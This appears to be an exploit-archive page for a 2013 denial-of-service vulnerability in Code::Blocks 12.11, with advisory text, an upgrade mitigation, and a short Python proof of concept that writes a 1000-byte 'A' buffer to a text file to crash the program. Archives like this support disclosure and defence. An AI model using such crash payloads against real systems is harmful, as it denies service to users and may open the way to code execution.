header-logo
Suggest Exploit
vendor:
Code::Blocks
by:
SecurityFocus
7,5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: Code::Blocks
Affected Version From: 12.11
Affected Version To: 12.11
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Code::Blocks Denial-of-Service Vulnerability

Code::Blocks is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.

Mitigation:

Upgrade to the latest version of Code::Blocks to mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/60208/info

Code::Blocks is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.

Code::Blocks 12.11 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
 
filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()